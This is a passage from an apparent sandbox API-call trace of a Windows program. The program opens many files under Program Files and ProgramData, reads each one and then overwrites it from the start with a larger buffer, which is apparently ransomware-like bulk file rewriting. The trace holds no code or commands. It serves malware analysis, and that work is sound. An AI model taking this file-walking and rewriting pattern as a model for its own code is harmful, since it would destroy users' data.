returned 0x1e4 [0155.294] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0155.294] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x19ee4 [0155.294] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0155.294] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0155.295] ReleaseMutex (hMutex=0x168) returned 1 [0155.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Uninstall.exe", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0155.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Uninstall.exe", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Uninstall.exe", lpUsedDefaultChar=0x0) returned 13 [0155.295] ReadFile (in: hFile=0x1e4, lpBuffer=0x288f948, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0155.310] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x18ee4 [0155.310] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0155.312] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x18ee4 [0155.312] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0155.314] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0155.314] WriteFile (in: hFile=0x1e4, lpBuffer=0x25aabd8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25aabd8*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0155.314] CloseHandle (hObject=0x1e4) returned 1 [0155.314] CreateFileW (lpFileName="C:\\Program Files (x86)\\Uninstall Information\\leechftp.exe" (normalized: "c:\\program files (x86)\\uninstall information\\leechftp.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0155.314] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Uninstall Information\\leechftp.exe", nBufferLength=0x104, lpBuffer=0x359f694, lpFilePart=0x359f690 | out: lpBuffer="C:\\Program Files (x86)\\Uninstall Information\\leechftp.exe", lpFilePart=0x359f690*="leechftp.exe") returned 0x39 [0155.314] GetLastError () returned 0x20 [0155.314] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x359f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i͙폈H͙퐔H͙L͙ꪀǷ\x01") returned 0x51 [0155.315] LocalFree (hMem=0x69e018) returned 0x0 [0155.315] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x359d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0155.315] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x359f894) [0155.315] RtlUnwind (TargetFrame=0x359f8fc, TargetIp=0x406ffc, ExceptionRecord=0x359f378, ReturnValue=0x0) [0155.315] RtlUnwind (TargetFrame=0x359f920, TargetIp=0x407184, ExceptionRecord=0x359f378, ReturnValue=0x0) [0155.315] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Uninstall Information\\leechftp.exe" (normalized: "c:\\program files (x86)\\uninstall information\\leechftp.exe")) returned 0x20 [0155.316] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui" (normalized: "c:\\program files (x86)\\windows photo viewer\\en-us\\photoacq.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0155.316] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui", nBufferLength=0x104, lpBuffer=0x359f694, lpFilePart=0x359f690 | out: lpBuffer="C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui", lpFilePart=0x359f690*="PhotoAcq.dll.mui") returned 0x42 [0155.316] GetLastError () returned 0x5 [0155.316] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x359f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i͙폈H͙퐔H͙L͙ꪀǷ\x01") returned 0x13 [0155.316] LocalFree (hMem=0x69e2b0) returned 0x0 [0155.316] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x359d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0155.316] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x359f894) [0155.317] RtlUnwind (TargetFrame=0x359f8fc, TargetIp=0x406ffc, ExceptionRecord=0x359f378, ReturnValue=0x0) [0155.317] RtlUnwind (TargetFrame=0x359f920, TargetIp=0x407184, ExceptionRecord=0x359f378, ReturnValue=0x0) [0155.317] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui" (normalized: "c:\\program files (x86)\\windows photo viewer\\en-us\\photoacq.dll.mui")) returned 0x20 [0155.317] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Portable Devices\\smartftp.exe" (normalized: "c:\\program files (x86)\\windows portable devices\\smartftp.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0155.318] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Portable Devices\\smartftp.exe", nBufferLength=0x104, lpBuffer=0x359f694, lpFilePart=0x359f690 | out: lpBuffer="C:\\Program Files (x86)\\Windows Portable Devices\\smartftp.exe", lpFilePart=0x359f690*="smartftp.exe") returned 0x3c [0155.318] GetLastError () returned 0x20 [0155.318] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x359f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i͙폈H͙퐔H͙L͙ꪀǷ\x01") returned 0x51 [0155.318] LocalFree (hMem=0x69e018) returned 0x0 [0155.318] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x359d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0155.318] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x359f894) [0155.318] RtlUnwind (TargetFrame=0x359f8fc, TargetIp=0x406ffc, ExceptionRecord=0x359f378, ReturnValue=0x0) [0155.319] RtlUnwind (TargetFrame=0x359f920, TargetIp=0x407184, ExceptionRecord=0x359f378, ReturnValue=0x0) [0155.319] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Portable Devices\\smartftp.exe" (normalized: "c:\\program files (x86)\\windows portable devices\\smartftp.exe")) returned 0x20 [0155.319] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.excel.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0158.417] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0158.417] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x15e [0158.417] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0158.417] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0158.418] ReleaseMutex (hMutex=0x168) returned 1 [0158.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.EXCEL.DEV.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0158.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.EXCEL.DEV.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x1f8fcfc, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.EXCEL.DEV.14.1033.hxn", lpUsedDefaultChar=0x0) returned 24 [0158.418] ReadFile (in: hFile=0x1dc, lpBuffer=0x26a8c68, nNumberOfBytesToRead=0x15e, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26a8c68*, lpNumberOfBytesRead=0x359f2bc*=0x15e, lpOverlapped=0x0) returned 1 [0158.419] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0158.419] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x6e6, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x359f2d0*=0x6e6, lpOverlapped=0x0) returned 1 [0158.420] CloseHandle (hObject=0x1dc) returned 1 [0158.420] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0158.421] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0158.421] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x146 [0158.421] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0158.421] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0158.422] ReleaseMutex (hMutex=0x168) returned 1 [0158.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSPUB.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0158.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSPUB.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x1f88b2c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.MSPUB.14.1033.hxn", lpUsedDefaultChar=0x0) returned 20 [0158.422] ReadFile (in: hFile=0x1dc, lpBuffer=0x25e9cd8, nNumberOfBytesToRead=0x146, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25e9cd8*, lpNumberOfBytesRead=0x359f2bc*=0x146, lpOverlapped=0x0) returned 1 [0158.423] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0158.423] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x6ce, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x359f2d0*=0x6ce, lpOverlapped=0x0) returned 1 [0158.423] CloseHandle (hObject=0x1dc) returned 1 [0158.424] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0158.425] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0158.425] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x170 [0158.425] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0158.425] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0158.425] ReleaseMutex (hMutex=0x168) returned 1 [0158.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.POWERPNT.DEV.14.1033.hxn", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0158.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.POWERPNT.DEV.14.1033.hxn", cchWideChar=27, lpMultiByteStr=0x1f8fcfc, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.POWERPNT.DEV.14.1033.hxn", lpUsedDefaultChar=0x0) returned 27 [0158.426] ReadFile (in: hFile=0x1dc, lpBuffer=0x26a8c68, nNumberOfBytesToRead=0x170, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26a8c68*, lpNumberOfBytesRead=0x359f2bc*=0x170, lpOverlapped=0x0) returned 1 [0158.427] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0158.427] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x6f8, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x359f2d0*=0x6f8, lpOverlapped=0x0) returned 1 [0158.427] CloseHandle (hObject=0x1dc) returned 1 [0158.427] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.winproj.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0158.428] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0158.429] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x16a [0158.429] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0158.429] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0158.429] ReleaseMutex (hMutex=0x168) returned 1 [0158.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.WINPROJ.DEV.14.1033.hxn", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0158.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.WINPROJ.DEV.14.1033.hxn", cchWideChar=26, lpMultiByteStr=0x1f8fcfc, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.WINPROJ.DEV.14.1033.hxn", lpUsedDefaultChar=0x0) returned 26 [0158.429] ReadFile (in: hFile=0x1dc, lpBuffer=0x26a8c68, nNumberOfBytesToRead=0x16a, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26a8c68*, lpNumberOfBytesRead=0x359f2bc*=0x16a, lpOverlapped=0x0) returned 1 [0158.430] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0158.430] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x6f2, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x359f2d0*=0x6f2, lpOverlapped=0x0) returned 1 [0158.430] CloseHandle (hObject=0x1dc) returned 1 [0158.430] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0158.431] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0158.431] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x28e [0158.431] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0158.432] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0158.432] ReleaseMutex (hMutex=0x168) returned 1 [0158.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="state.rsm", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0158.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="state.rsm", cchWideChar=9, lpMultiByteStr=0x1f735ac, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="state.rsm", lpUsedDefaultChar=0x0) returned 9 [0158.432] ReadFile (in: hFile=0x1dc, lpBuffer=0x286daa8, nNumberOfBytesToRead=0x28e, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286daa8*, lpNumberOfBytesRead=0x359f2bc*=0x28e, lpOverlapped=0x0) returned 1 [0158.433] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0158.433] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x816, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x359f2d0*=0x816, lpOverlapped=0x0) returned 1 [0158.433] CloseHandle (hObject=0x1dc) returned 1 [0158.433] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0158.434] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0158.434] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x4f699e [0158.434] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0158.434] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0158.434] ReleaseMutex (hMutex=0x168) returned 1 [0158.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0158.434] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x1f7352c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cab1.cab", lpUsedDefaultChar=0x0) returned 8 [0158.434] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0158.437] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0xf000, lpOverlapped=0x0) returned 1 [0158.438] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x359f278*=0x2000, lpOverlapped=0x0) returned 1 [0158.439] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x4f499e [0158.439] ReadFile (in: hFile=0x1dc, lpBuffer=0x286da88, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesRead=0x359f278*=0x2000, lpOverlapped=0x0) returned 1 [0158.441] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x4f499e [0158.442] WriteFile (in: hFile=0x1dc, lpBuffer=0x286da88*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesWritten=0x359f28c*=0x2588, lpOverlapped=0x0) returned 1 [0158.442] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0158.442] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0158.443] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0158.443] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x359f28c*=0x2000, lpOverlapped=0x0) returned 1 [0158.443] CloseHandle (hObject=0x1dc) returned 1 [0158.443] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0158.444] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0158.444] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x4ea418 [0158.444] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0158.444] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0158.444] ReleaseMutex (hMutex=0x168) returned 1 [0158.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0158.444] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 